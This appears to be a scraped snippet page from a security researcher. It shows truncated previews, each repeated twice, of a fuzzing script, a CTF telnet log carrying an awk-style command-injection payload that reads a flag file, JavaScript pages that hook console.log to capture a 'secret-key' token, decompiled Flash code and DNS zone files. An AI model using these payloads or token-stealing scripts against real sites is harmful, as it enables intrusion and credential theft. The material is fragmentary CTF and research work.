ZoczuS

## autoffuf.sh
#!/bin/bash
#
# Usage: ./autoffuf.sh http://example.com
#
# (C) Jakub Żoczek
# https://twitter.com/zoczus
#####

url=$1
wordlist="/opt/common.txt"

## web50
c40957:ctf jakub.zoczek$ telnet web50.ctf 80
Trying 10.240.160.22...
Connected to web50.ctf.
Escape character is '^]'.
GET a";x=getline%20line<"./flag";x=getline%20line<"./flag";print%20line;uri="fala HTTP/1.1

HTTP/1.1 200 OK
Server: /bin/bash
Content-Type: text/html

## mailsteal.html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
</head>
<body>
<script>
	console.log=function(a){
		if(a == "Start") {
			// start ;-)

## 3bugs.html
<html><body>
<script>
	console.log=function(a){
		var x = document.getElementById("content");
		if(a == "Start") {
			// start ;-)
		}
		else {
			var pos = a.search("secret-key");
			var token = a.substring(pos+13, pos+13+33);

## cd.as
package {
        import flash.net.*;
        import flash.system.*;
        import flash.events.*;
        import flash.external.ExternalInterface;
        import flash.display.*;
        import flash.text.*;

        public class cd extends Sprite{
                public var room:Loader;

## kraski-universal-blogplayer.as
/*
 * Source code for kraski-universal-blogplayer.swf (C) Yandex
 *
 * Decompiled using flaczki - https://github.com/chung-leong/flaczki
 *
 */
package ru.yandex.kraski.universalpainter.preloader
{
    public class KraskiPreloader extends flash.display::Sprite implements {mx.preloaders}::IPreloaderDisplay
    {

## 1.2.3.4

$TTL 3600
@       IN      SOA     ns1.blabla.com. admin.blabla.com.     (
2014011414            ;serial
14400                 ;refresh
3600                  ;retry
604800                ;expire
10800                 ;minimum
)

## named.conf
zone "4.3.2.1.in-addr.arpa." IN {
        type master;
        allow-transfer { 8.8.8.8; }; // put your 2nd dns ip here
        check-names ignore;
        file "/etc/bind/1.2.3.4";
};
	#!/bin/bash
	#
	# Usage: ./autoffuf.sh http://example.com
	#
	# (C) Jakub Żoczek
	# https://twitter.com/zoczus
	#####

	url=$1
	wordlist="/opt/common.txt"
	c40957:ctf jakub.zoczek$ telnet web50.ctf 80
	Trying 10.240.160.22...
	Connected to web50.ctf.
	Escape character is '^]'.
	GET a";x=getline%20line<"./flag";x=getline%20line<"./flag";print%20line;uri="fala HTTP/1.1

	HTTP/1.1 200 OK
	Server: /bin/bash
	Content-Type: text/html

	<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
	</head>
	<body>
	<script>
	console.log=function(a){
	if(a == "Start") {
	// start ;-)
	<html><body>
	<script>
	console.log=function(a){
	var x = document.getElementById("content");
	if(a == "Start") {
	// start ;-)
	}
	else {
	var pos = a.search("secret-key");
	var token = a.substring(pos+13, pos+13+33);
	package {
	import flash.net.*;
	import flash.system.*;
	import flash.events.*;
	import flash.external.ExternalInterface;
	import flash.display.*;
	import flash.text.*;

	public class cd extends Sprite{
	public var room:Loader;
	/*
	* Source code for kraski-universal-blogplayer.swf (C) Yandex
	*
	* Decompiled using flaczki - https://github.com/chung-leong/flaczki
	*
	*/
	package ru.yandex.kraski.universalpainter.preloader
	{
	public class KraskiPreloader extends flash.display::Sprite implements {mx.preloaders}::IPreloaderDisplay
	{

	$TTL 3600
	@ IN SOA ns1.blabla.com. admin.blabla.com. (
	2014011414 ;serial
	14400 ;refresh
	3600 ;retry
	604800 ;expire
	10800 ;minimum
	)
	zone "4.3.2.1.in-addr.arpa." IN {
	type master;
	allow-transfer { 8.8.8.8; }; // put your 2nd dns ip here
	check-names ignore;
	file "/etc/bind/1.2.3.4";
	};